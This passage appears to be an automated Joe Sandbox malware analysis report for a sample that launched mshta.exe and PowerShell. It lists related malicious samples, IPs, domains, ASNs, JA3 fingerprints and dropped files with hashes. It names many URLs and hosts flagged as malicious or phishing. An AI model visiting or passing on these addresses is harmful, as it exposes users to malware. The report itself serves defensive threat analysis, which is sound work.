                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.171.202, 142.250.181.67, 23.218.208.109, 13.107.246.43, 172.202.163.200
                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, fonts.gstatic.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 7544 because it is empty
                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7464 because it is empty
                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                          Simulations

                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                          02:43:21API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                          02:43:21API Interceptor2x Sleep call for process: mshta.exe modified

                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                          IPs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          213.180.204.90Universal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • an.yandex.ru/resource/context.js?rnd=48090
                                                                                                                                                                                          95.163.52.67Universal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • d0.c8.bf.a0.top.list.ru/counter?id=1015977;js=13;r=;j=false;s=1280*1024;d=24;rand=0.7243987928327991
                                                                                                                                                                                          http://www.tehbez.ru/Docum/DocumShow_DocumID_748.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • d5.c5.b9.a0.top.list.ru/counter?id=611501;t=210;l=1
                                                                                                                                                                                          109.200.199.111http://www.5movierulz.momGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            http://boomba.clubGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              https://jointcharging.comGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                Domains

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                counter.yadro.rucare.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.201.198
                                                                                                                                                                                                http://www.goo.su/c1Rnox/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                http://bk.ruGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                http://supermario-game.com/deGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.202.52
                                                                                                                                                                                                checklist.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.201.198
                                                                                                                                                                                                checklist.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                file.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                http://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.201.198
                                                                                                                                                                                                http://vidaliaonion.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.201.198
                                                                                                                                                                                                https://u.to/W9rXIAGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 88.212.201.198
                                                                                                                                                                                                top-fwz1.mail.ruhttps://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                http://www.goo.su/c1Rnox/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                http://bk.ruGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                http://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                http://vidaliaonion.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                https://www.izmailovo.ru/contacts/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                https://lenta.ru/articles/2023/01/13/darkpr/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                http://www.goo.su/JpY9S/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                http://manga-netflix10737.tinyblogging.com.xx3.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                http://roxbro.wallst.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                enduresopens.comhttp://www.goo.su/c1Rnox/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 23.109.170.26
                                                                                                                                                                                                http://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 94.242.236.128
                                                                                                                                                                                                http://www.goo.su/JpY9S/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 23.109.170.99
                                                                                                                                                                                                https://goo.su/l1bfUYRGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 23.109.170.73
                                                                                                                                                                                                https://goo.su/mwrmXGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 94.242.236.133
                                                                                                                                                                                                https://goo.su/PNCCz1UGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 23.109.248.165
                                                                                                                                                                                                https://goo.su/PNCCz1UGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 23.109.248.150

                                                                                                                                                                                                ASNs

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                NIVAL-ASRUhttps://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.41.56
                                                                                                                                                                                                https://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.89
                                                                                                                                                                                                sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 128.140.171.190
                                                                                                                                                                                                https://trk.mail.ru/c/kruxy7?clickid=mtg66f14a9e6633b800088f731w&mt_campaign=ss_mark_se_ios&mt_creat%20ive=m-%20se23.mp4&mt_gaid=&mt_idfa=&mt_network=mtg1206891918&mt_oaid=&mt_sub1=ss_mark_se_ios&mt_sub2=mtg12068%2091918&mt_sub3=1809824272&mt_sub5=ss_mark_se_iosGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.41.56
                                                                                                                                                                                                http://www.goo.su/c1Rnox/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.89
                                                                                                                                                                                                http://bk.ruGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 95.163.59.195
                                                                                                                                                                                                http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.41.56
                                                                                                                                                                                                http://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.89
                                                                                                                                                                                                http://vidaliaonion.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                https://www.izmailovo.ru/contacts/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 95.163.52.89
                                                                                                                                                                                                I3DNETNLla.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 146.247.77.107
                                                                                                                                                                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 188.122.77.117
                                                                                                                                                                                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 31.204.141.79
                                                                                                                                                                                                la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 31.204.128.53
                                                                                                                                                                                                http://www.5movierulz.momGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 31.204.132.207
                                                                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 5.200.24.66
                                                                                                                                                                                                https://budivenut.com/bAGMhBTY81DQ0DRMJ1XOQUUSFVUf9ARgYwDOI1O1UxFG8AJXEwDbZRAlQiDHcDIShTNa4gYPQjUu8AKO81BRGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 31.204.159.251
                                                                                                                                                                                                mirai.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 109.200.201.125
                                                                                                                                                                                                https://www.leaflogistic.co/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 31.204.132.207
                                                                                                                                                                                                8z01Dy0K58.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                • 185.189.181.125
                                                                                                                                                                                                YANDEXRUhttp://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                • 77.88.21.119
                                                                                                                                                                                                http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                • 77.88.21.119
                                                                                                                                                                                                http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                • 87.250.251.119
                                                                                                                                                                                                SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                • 77.88.21.249
                                                                                                                                                                                                https://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                • 77.88.21.119
                                                                                                                                                                                                https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 77.88.55.88
                                                                                                                                                                                                https://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 77.88.55.88
                                                                                                                                                                                                https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 77.88.21.119
                                                                                                                                                                                                https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 77.88.21.119
                                                                                                                                                                                                https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 77.88.21.119

                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204
                                                                                                                                                                                                Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 213.180.204.90
                                                                                                                                                                                                • 95.163.52.67
                                                                                                                                                                                                • 109.200.199.111
                                                                                                                                                                                                • 23.109.170.83
                                                                                                                                                                                                • 172.67.139.105
                                                                                                                                                                                                • 88.212.201.204

                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                No context

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                Entropy (8bit):0.706720019305922
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqQ:2JIB/wUKUKQncEmYRTwh08
                                                                                                                                                                                                MD5:3C685C6FCB24818C68711B46A74DEB74
                                                                                                                                                                                                SHA1:62C2F3611DDB00A4D76B6875F5E4B3AE2387D1FF
                                                                                                                                                                                                SHA-256:F17C5DC9A41B398020A30AA6939CBF121C6DE933F9B431148A1D961F74A8629C
                                                                                                                                                                                                SHA-512:B0B9B32A915479AFAFE6B9A10197E9F487D01F071721EA08A8646892C6DEBAA0A1C24099968101EB19828CF66B6480B8DB1FE217D968974EA2C846393C2E1690
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x06f0fdad, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                Entropy (8bit):0.7900221010947818
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                                                                                                                                                                MD5:0F7C354F8222F8FED012CC029F26F621
                                                                                                                                                                                                SHA1:C044C76015E93F1E12211634EF1A3E91F04098AE
                                                                                                                                                                                                SHA-256:CD54DA35E3FA7599515BDB5DC6F073F0C4DB35A30EA3F3BBC87C08214BB07AAA
                                                                                                                                                                                                SHA-512:BBC0CB297E8B238CE418E7AE7A2B81DCC2A6671BF528AFAE7FFF0417403CF976C2C5CE95681E5AE3C95DB2D86AF37E5C285E7F0080BCFF7A0AE9E7D0586867E9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:....... ...............X\...;...{......................0.`.....42...{5..+...|i.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................("T.+...|i.................!....+...|i..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                Entropy (8bit):0.08214642395097635
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:XF3W/EYeHmpyZzeqt/57Dek3J3m08HYllEqW3l/TjzzQ/t:V3W8zHbZzPR3t3AHImd8/
                                                                                                                                                                                                MD5:72E0C072255990F36AFA05DC3B803D68
                                                                                                                                                                                                SHA1:34ADA488AD8434E87A0F137E2600DAD2D3FA1F13
                                                                                                                                                                                                SHA-256:F8588C42A9ED2B5F218B677BD85896F4B720F151CD354C621BEC3319991F56B5
                                                                                                                                                                                                SHA-512:F4A4615B16D1BDE36ADC3D54ECB0FEE888E0433D173C8A53D483270EFBD18A6E5E6FE3046F99CECCC332445712D86E864E0A0C0F5FA67F331D1290D396DCA412
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:K=.......................................;...{...+...|i.42...{5.........42...{5.42...{5...Y.42...{59................!....+...|i.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\G0DHAHFS\goo[1].xml

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                Entropy (8bit):2.469670487371862
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                                MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                                SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                                SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                                SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<root></root>

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):49120
                                                                                                                                                                                                Entropy (8bit):0.0017331682157558962
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Ztt:T
                                                                                                                                                                                                MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                                                SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                                                SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                                                SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\error[1]

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1706
                                                                                                                                                                                                Entropy (8bit):5.274543201400288
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                                MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                                SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                                SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                                SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\error[2]

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3249
                                                                                                                                                                                                Entropy (8bit):5.4598794938059125
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                                                                                                MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                                                                                                SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                                                                                                SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                                                                                                SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\J3JHqIi[1].htm

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7357)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21298
                                                                                                                                                                                                Entropy (8bit):5.695706907590437
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:LnuhACTAjGJK5NuJL14AvqDy6zZqaRuhgGNd9rTriBYriBtCkQNKNko:LnuhACTAjGJKfuJCANQ8nhgMvrsYrsQe
                                                                                                                                                                                                MD5:3AE8F22CA2DDA278A94E52FC1559D01D
                                                                                                                                                                                                SHA1:8315E9B3B4DB82D0C863E95159E6BB27E156A16C
                                                                                                                                                                                                SHA-256:A5151D8919A5F9893B1D4197E1434D3A305864C5E6AE6D218EA66C95F2309E8E
                                                                                                                                                                                                SHA-512:DCBE00CAFC41824281400A82ED87A7E072EBF25F155F00E76E4CE06D90CCD2273B137A593BB9697BB988B0320E46BF43D9846A0E80D2FECD1C21B69D5CFC602D
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<!doctype html>.<html lang="en">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="robots" content="noindex">. <link rel="apple-touch-icon" sizes="180x180" href="/img/favicons/apple-touch-icon.png">. <link rel="icon" type="image/png" sizes="32x32" href="/img/favicons/favicon-32x32.png">. <link rel="icon" type="image/png" sizes="16x16" href="/img/favicons/favicon-16x16.png">. <link rel="manifest" href="/img/favicons/site.webmanifest">. <link rel="mask-icon" href="/img/favicons/safari-pinned-tab.svg" color="#5bbad5">. <meta name="msapplication-TileColor" content="#2d89ef">. <meta name="theme-color" content="#ffffff">.. <meta name="robots" content="none" />. <title>Redirecting</title>. <meta name="description" content="">. <meta name="keywords" content="">.. . Fonts -->. <link href="https://fonts.googleapis.com/css?family=Open Sans:400&display=swap" rel="styl

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\css[1].css

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                Entropy (8bit):5.239847108576611
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:0SYWFFWlIYCzHRiRI5XwDKLRIHDfFRWdFWLRI9j9v7fqzrZqcdUDKdbTENRg7pLX:0IFFli+56ZRWHMqh7izlpdUD4bJ1L7rv
                                                                                                                                                                                                MD5:3EFEBC2C8C9FB9BF14527772FB2359BB
                                                                                                                                                                                                SHA1:57BD131E430E64911C825C9BE08D44D81D42C0A2
                                                                                                                                                                                                SHA-256:F7EE8C594B61C053066065573A90C283841ED469ACE1152C759355BEB18B3AAC
